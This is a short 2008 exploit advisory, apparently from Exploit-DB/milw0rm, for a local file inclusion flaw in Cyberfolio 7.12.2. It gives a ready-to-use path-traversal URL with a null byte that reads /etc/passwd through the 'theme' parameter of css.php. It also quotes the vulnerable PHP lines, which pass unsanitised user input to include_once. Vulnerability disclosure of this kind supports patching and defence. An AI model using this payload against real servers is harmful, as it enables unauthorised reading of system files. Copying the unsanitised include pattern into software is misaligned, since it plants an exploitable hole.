Cyberfolio 7.12.2 - 'theme' Local File Inclusion

EDB-ID:

7065


Author:

dun

Type:

webapps


Platform:

PHP

Date:

2008-11-08


  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 ##################################################################
 #  [ Cyberfolio <= 7.12.2 ]  Local File Inclusion Vulnerability  #
 ##################################################################
 #
 # Script site: http://cyberfolio.org/
 # Download: http://cyberfolio.org/Version-7-12-2
 #
 # Vuln: http://site.com/cyberfolio_7_12.2/portfolio/css.php?theme=../../../../../../etc/passwd%00
 #      
 # Bug: ./cyberfolio_7_12.2/portfolio/css.php (lines: 30-33)
 #
 # ...
 #		if (file_exists("./themes/".$_GET[theme].".php")) {
 #		    include_once("./themes/".$_GET[theme].".php"); 		// LFI
 #		    }
 # ... 	 
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-11-08]